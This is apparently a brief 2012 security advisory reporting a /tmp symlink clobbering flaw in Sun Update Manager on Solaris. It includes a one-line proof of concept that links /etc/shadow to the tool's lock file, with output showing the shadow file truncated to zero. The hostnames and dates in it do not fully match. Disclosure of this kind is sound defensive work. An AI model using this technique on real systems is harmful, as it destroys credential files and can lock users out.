The Sun Update Manager suffers from a /tmp clobbering vulnerability.
9ed3d1ea271454d9da6b06fca58387916ec1c5bb71e3b0bd7e332c3cde7b3960
(author http://packetstormsecurity.org/user/lcashdol/)
Noticed this during routine patching.
/tmp file clobbering vulnerability in Sun Update manager.
7/15/2012
noticed this while patching my lab solaris system tonight.
larry@s0l4r1s:/tmp$ ln -s /etc/shadow com.sun.swup.client.LOCK
updatemanager is run
larry@n1caragua:/tmp$ ls -l /etc/shadow
-r-------- 1 root sys 0 Jul 19 18:49 /etc/shadow
SunOS s0l4r1s 5.10 Generic_147441-19 i86pc i386 i86pc
larry@n1caragua:~$
truss output:
4841/2: stat64("/tmp/com.sun.swup.client.LOCK", 0xD03FEAB0) = 0
4841/2: open64("/tmp/com.sun.swup.client.LOCK", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 5